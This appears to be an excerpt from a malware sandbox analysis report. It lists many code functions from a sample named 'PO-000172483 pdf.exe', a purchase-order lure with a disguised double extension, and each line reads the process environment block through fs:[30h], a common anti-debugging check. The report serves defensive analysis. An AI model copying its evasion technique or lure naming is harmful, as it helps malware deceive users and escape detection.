Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E5CF mov eax, dword ptr fs:[00000030h]	7_2_0177E5CF
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017645B1 mov eax, dword ptr fs:[00000030h]	7_2_017645B1
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017645B1 mov eax, dword ptr fs:[00000030h]	7_2_017645B1
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C05A7 mov eax, dword ptr fs:[00000030h]	7_2_017C05A7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C05A7 mov eax, dword ptr fs:[00000030h]	7_2_017C05A7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C05A7 mov eax, dword ptr fs:[00000030h]	7_2_017C05A7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E59C mov eax, dword ptr fs:[00000030h]	7_2_0177E59C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01742582 mov eax, dword ptr fs:[00000030h]	7_2_01742582
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01742582 mov ecx, dword ptr fs:[00000030h]	7_2_01742582
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01774588 mov eax, dword ptr fs:[00000030h]	7_2_01774588
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176A470 mov eax, dword ptr fs:[00000030h]	7_2_0176A470
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176A470 mov eax, dword ptr fs:[00000030h]	7_2_0176A470
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176A470 mov eax, dword ptr fs:[00000030h]	7_2_0176A470
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CC460 mov ecx, dword ptr fs:[00000030h]	7_2_017CC460
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176245A mov eax, dword ptr fs:[00000030h]	7_2_0176245A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173645D mov eax, dword ptr fs:[00000030h]	7_2_0173645D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E443 mov eax, dword ptr fs:[00000030h]	7_2_0177E443
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E443 mov eax, dword ptr fs:[00000030h]	7_2_0177E443
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E443 mov eax, dword ptr fs:[00000030h]	7_2_0177E443
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E443 mov eax, dword ptr fs:[00000030h]	7_2_0177E443
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E443 mov eax, dword ptr fs:[00000030h]	7_2_0177E443
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E443 mov eax, dword ptr fs:[00000030h]	7_2_0177E443
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E443 mov eax, dword ptr fs:[00000030h]	7_2_0177E443
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E443 mov eax, dword ptr fs:[00000030h]	7_2_0177E443
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177A430 mov eax, dword ptr fs:[00000030h]	7_2_0177A430
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173E420 mov eax, dword ptr fs:[00000030h]	7_2_0173E420
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173E420 mov eax, dword ptr fs:[00000030h]	7_2_0173E420
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173E420 mov eax, dword ptr fs:[00000030h]	7_2_0173E420
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173C427 mov eax, dword ptr fs:[00000030h]	7_2_0173C427
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C6420 mov eax, dword ptr fs:[00000030h]	7_2_017C6420
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C6420 mov eax, dword ptr fs:[00000030h]	7_2_017C6420
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C6420 mov eax, dword ptr fs:[00000030h]	7_2_017C6420
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C6420 mov eax, dword ptr fs:[00000030h]	7_2_017C6420
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C6420 mov eax, dword ptr fs:[00000030h]	7_2_017C6420
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C6420 mov eax, dword ptr fs:[00000030h]	7_2_017C6420
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C6420 mov eax, dword ptr fs:[00000030h]	7_2_017C6420
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01778402 mov eax, dword ptr fs:[00000030h]	7_2_01778402
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01778402 mov eax, dword ptr fs:[00000030h]	7_2_01778402
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01778402 mov eax, dword ptr fs:[00000030h]	7_2_01778402
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017404E5 mov ecx, dword ptr fs:[00000030h]	7_2_017404E5
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017744B0 mov ecx, dword ptr fs:[00000030h]	7_2_017744B0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CA4B0 mov eax, dword ptr fs:[00000030h]	7_2_017CA4B0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017464AB mov eax, dword ptr fs:[00000030h]	7_2_017464AB
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748770 mov eax, dword ptr fs:[00000030h]	7_2_01748770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770 mov eax, dword ptr fs:[00000030h]	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770 mov eax, dword ptr fs:[00000030h]	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770 mov eax, dword ptr fs:[00000030h]	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770 mov eax, dword ptr fs:[00000030h]	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770 mov eax, dword ptr fs:[00000030h]	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770 mov eax, dword ptr fs:[00000030h]	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770 mov eax, dword ptr fs:[00000030h]	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770 mov eax, dword ptr fs:[00000030h]	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770 mov eax, dword ptr fs:[00000030h]	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770 mov eax, dword ptr fs:[00000030h]	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770 mov eax, dword ptr fs:[00000030h]	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750770 mov eax, dword ptr fs:[00000030h]	7_2_01750770
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CE75D mov eax, dword ptr fs:[00000030h]	7_2_017CE75D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01740750 mov eax, dword ptr fs:[00000030h]	7_2_01740750
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782750 mov eax, dword ptr fs:[00000030h]	7_2_01782750
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782750 mov eax, dword ptr fs:[00000030h]	7_2_01782750
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C4755 mov eax, dword ptr fs:[00000030h]	7_2_017C4755
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177674D mov esi, dword ptr fs:[00000030h]	7_2_0177674D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177674D mov eax, dword ptr fs:[00000030h]	7_2_0177674D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177674D mov eax, dword ptr fs:[00000030h]	7_2_0177674D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177273C mov eax, dword ptr fs:[00000030h]	7_2_0177273C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177273C mov ecx, dword ptr fs:[00000030h]	7_2_0177273C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177273C mov eax, dword ptr fs:[00000030h]	7_2_0177273C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BC730 mov eax, dword ptr fs:[00000030h]	7_2_017BC730
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177C720 mov eax, dword ptr fs:[00000030h]	7_2_0177C720
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177C720 mov eax, dword ptr fs:[00000030h]	7_2_0177C720
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01740710 mov eax, dword ptr fs:[00000030h]	7_2_01740710
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01770710 mov eax, dword ptr fs:[00000030h]	7_2_01770710
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177C700 mov eax, dword ptr fs:[00000030h]	7_2_0177C700
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017447FB mov eax, dword ptr fs:[00000030h]	7_2_017447FB
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017447FB mov eax, dword ptr fs:[00000030h]	7_2_017447FB
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017627ED mov eax, dword ptr fs:[00000030h]	7_2_017627ED
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017627ED mov eax, dword ptr fs:[00000030h]	7_2_017627ED
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017627ED mov eax, dword ptr fs:[00000030h]	7_2_017627ED
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CE7E1 mov eax, dword ptr fs:[00000030h]	7_2_017CE7E1
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174C7C0 mov eax, dword ptr fs:[00000030h]	7_2_0174C7C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C07C3 mov eax, dword ptr fs:[00000030h]	7_2_017C07C3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017407AF mov eax, dword ptr fs:[00000030h]	7_2_017407AF
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E678E mov eax, dword ptr fs:[00000030h]	7_2_017E678E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01772674 mov eax, dword ptr fs:[00000030h]	7_2_01772674
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177A660 mov eax, dword ptr fs:[00000030h]	7_2_0177A660
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177A660 mov eax, dword ptr fs:[00000030h]	7_2_0177A660
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175C640 mov eax, dword ptr fs:[00000030h]	7_2_0175C640
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175E627 mov eax, dword ptr fs:[00000030h]	7_2_0175E627
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01776620 mov eax, dword ptr fs:[00000030h]	7_2_01776620
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01778620 mov eax, dword ptr fs:[00000030h]	7_2_01778620
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174262C mov eax, dword ptr fs:[00000030h]	7_2_0174262C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01782619 mov eax, dword ptr fs:[00000030h]	7_2_01782619
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BE609 mov eax, dword ptr fs:[00000030h]	7_2_017BE609
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175260B mov eax, dword ptr fs:[00000030h]	7_2_0175260B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175260B mov eax, dword ptr fs:[00000030h]	7_2_0175260B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175260B mov eax, dword ptr fs:[00000030h]	7_2_0175260B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175260B mov eax, dword ptr fs:[00000030h]	7_2_0175260B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175260B mov eax, dword ptr fs:[00000030h]	7_2_0175260B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175260B mov eax, dword ptr fs:[00000030h]	7_2_0175260B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175260B mov eax, dword ptr fs:[00000030h]	7_2_0175260B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BE6F2 mov eax, dword ptr fs:[00000030h]	7_2_017BE6F2
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BE6F2 mov eax, dword ptr fs:[00000030h]	7_2_017BE6F2
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BE6F2 mov eax, dword ptr fs:[00000030h]	7_2_017BE6F2
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BE6F2 mov eax, dword ptr fs:[00000030h]	7_2_017BE6F2
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C06F1 mov eax, dword ptr fs:[00000030h]	7_2_017C06F1
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C06F1 mov eax, dword ptr fs:[00000030h]	7_2_017C06F1
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177A6C7 mov ebx, dword ptr fs:[00000030h]	7_2_0177A6C7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177A6C7 mov eax, dword ptr fs:[00000030h]	7_2_0177A6C7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017766B0 mov eax, dword ptr fs:[00000030h]	7_2_017766B0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177C6A6 mov eax, dword ptr fs:[00000030h]	7_2_0177C6A6
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01744690 mov eax, dword ptr fs:[00000030h]	7_2_01744690
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01744690 mov eax, dword ptr fs:[00000030h]	7_2_01744690
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180866E mov eax, dword ptr fs:[00000030h]	7_2_0180866E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180866E mov eax, dword ptr fs:[00000030h]	7_2_0180866E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CC97C mov eax, dword ptr fs:[00000030h]	7_2_017CC97C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E4978 mov eax, dword ptr fs:[00000030h]	7_2_017E4978
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E4978 mov eax, dword ptr fs:[00000030h]	7_2_017E4978
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01766962 mov eax, dword ptr fs:[00000030h]	7_2_01766962
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01766962 mov eax, dword ptr fs:[00000030h]	7_2_01766962
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01766962 mov eax, dword ptr fs:[00000030h]	7_2_01766962
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0178096E mov eax, dword ptr fs:[00000030h]	7_2_0178096E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0178096E mov edx, dword ptr fs:[00000030h]	7_2_0178096E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0178096E mov eax, dword ptr fs:[00000030h]	7_2_0178096E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C0946 mov eax, dword ptr fs:[00000030h]	7_2_017C0946
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180A9D3 mov eax, dword ptr fs:[00000030h]	7_2_0180A9D3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C892A mov eax, dword ptr fs:[00000030h]	7_2_017C892A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D892B mov eax, dword ptr fs:[00000030h]	7_2_017D892B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01738918 mov eax, dword ptr fs:[00000030h]	7_2_01738918
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01738918 mov eax, dword ptr fs:[00000030h]	7_2_01738918
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CC912 mov eax, dword ptr fs:[00000030h]	7_2_017CC912
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BE908 mov eax, dword ptr fs:[00000030h]	7_2_017BE908
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BE908 mov eax, dword ptr fs:[00000030h]	7_2_017BE908
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017729F9 mov eax, dword ptr fs:[00000030h]	7_2_017729F9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017729F9 mov eax, dword ptr fs:[00000030h]	7_2_017729F9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CE9E0 mov eax, dword ptr fs:[00000030h]	7_2_017CE9E0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0174A9D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0174A9D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0174A9D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0174A9D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0174A9D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0174A9D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017749D0 mov eax, dword ptr fs:[00000030h]	7_2_017749D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D69C0 mov eax, dword ptr fs:[00000030h]	7_2_017D69C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C89B3 mov esi, dword ptr fs:[00000030h]	7_2_017C89B3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C89B3 mov eax, dword ptr fs:[00000030h]	7_2_017C89B3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C89B3 mov eax, dword ptr fs:[00000030h]	7_2_017C89B3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017529A0 mov eax, dword ptr fs:[00000030h]	7_2_017529A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017409AD mov eax, dword ptr fs:[00000030h]	7_2_017409AD
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017409AD mov eax, dword ptr fs:[00000030h]	7_2_017409AD
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D6870 mov eax, dword ptr fs:[00000030h]	7_2_017D6870
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D6870 mov eax, dword ptr fs:[00000030h]	7_2_017D6870
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CE872 mov eax, dword ptr fs:[00000030h]	7_2_017CE872
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CE872 mov eax, dword ptr fs:[00000030h]	7_2_017CE872
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01770854 mov eax, dword ptr fs:[00000030h]	7_2_01770854
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01744859 mov eax, dword ptr fs:[00000030h]	7_2_01744859
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01744859 mov eax, dword ptr fs:[00000030h]	7_2_01744859
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01752840 mov ecx, dword ptr fs:[00000030h]	7_2_01752840
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01762835 mov eax, dword ptr fs:[00000030h]	7_2_01762835
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01762835 mov eax, dword ptr fs:[00000030h]	7_2_01762835
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01762835 mov eax, dword ptr fs:[00000030h]	7_2_01762835
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01762835 mov ecx, dword ptr fs:[00000030h]	7_2_01762835
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01762835 mov eax, dword ptr fs:[00000030h]	7_2_01762835
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01762835 mov eax, dword ptr fs:[00000030h]	7_2_01762835
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E483A mov eax, dword ptr fs:[00000030h]	7_2_017E483A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E483A mov eax, dword ptr fs:[00000030h]	7_2_017E483A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177A830 mov eax, dword ptr fs:[00000030h]	7_2_0177A830
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180A8E4 mov eax, dword ptr fs:[00000030h]	7_2_0180A8E4
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CC810 mov eax, dword ptr fs:[00000030h]	7_2_017CC810
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177C8F9 mov eax, dword ptr fs:[00000030h]	7_2_0177C8F9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177C8F9 mov eax, dword ptr fs:[00000030h]	7_2_0177C8F9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E8C0 mov eax, dword ptr fs:[00000030h]	7_2_0176E8C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017CC89D mov eax, dword ptr fs:[00000030h]	7_2_017CC89D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01740887 mov eax, dword ptr fs:[00000030h]	7_2_01740887
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173CB7E mov eax, dword ptr fs:[00000030h]	7_2_0173CB7E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E8B42 mov eax, dword ptr fs:[00000030h]	7_2_017E8B42
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D6B40 mov eax, dword ptr fs:[00000030h]	7_2_017D6B40
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D6B40 mov eax, dword ptr fs:[00000030h]	7_2_017D6B40
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176EB20 mov eax, dword ptr fs:[00000030h]	7_2_0176EB20
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176EB20 mov eax, dword ptr fs:[00000030h]	7_2_0176EB20
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BEB1D mov eax, dword ptr fs:[00000030h]	7_2_017BEB1D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BEB1D mov eax, dword ptr fs:[00000030h]	7_2_017BEB1D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BEB1D mov eax, dword ptr fs:[00000030h]	7_2_017BEB1D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BEB1D mov eax, dword ptr fs:[00000030h]	7_2_017BEB1D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BEB1D mov eax, dword ptr fs:[00000030h]	7_2_017BEB1D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BEB1D mov eax, dword ptr fs:[00000030h]	7_2_017BEB1D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BEB1D mov eax, dword ptr fs:[00000030h]	7_2_017BEB1D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BEB1D mov eax, dword ptr fs:[00000030h]	7_2_017BEB1D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BEB1D mov eax, dword ptr fs:[00000030h]	7_2_017BEB1D
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748BF0 mov eax, dword ptr fs:[00000030h]	7_2_01748BF0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748BF0 mov eax, dword ptr fs:[00000030h]	7_2_01748BF0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748BF0 mov eax, dword ptr fs:[00000030h]	7_2_01748BF0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176EBFC mov eax, dword ptr fs:[00000030h]	7_2_0176EBFC
